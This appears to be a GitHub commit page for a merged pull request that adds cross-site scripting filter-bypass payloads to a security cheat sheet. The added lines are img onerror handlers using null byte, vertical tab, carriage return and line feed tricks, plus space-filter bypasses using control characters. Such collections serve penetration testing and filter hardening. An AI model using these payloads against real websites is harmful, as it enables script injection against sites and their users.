Merge pull request #728 from isacaya/add_xss_bypass

Add a few XSS filter bypass cases
Swissky 2024-11-02 15:16:46 +01:00 committed by GitHub
commit 6e77f624f2
No known key found for this signature in database
GPG key ID: B5690EEEBB952194


@ -805,9 +805,11 @@ setTimeout`alert\u0028document.domain\u0029`;
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
// Bypass onxxx= filter with a null byte/vertical tab
// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror\x0d=alert(0) />
<img src='1' onerror\x0a=alert(0) />
// Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) />
@ -819,7 +821,7 @@ setTimeout`alert\u0028document.domain\u0029`;
// Bypass space filter with "/"
<img/src='1'/onerror=alert(0)>
// Bypass space filter with 0x0c/^L
// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I
<svg onload = alert(1) >
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd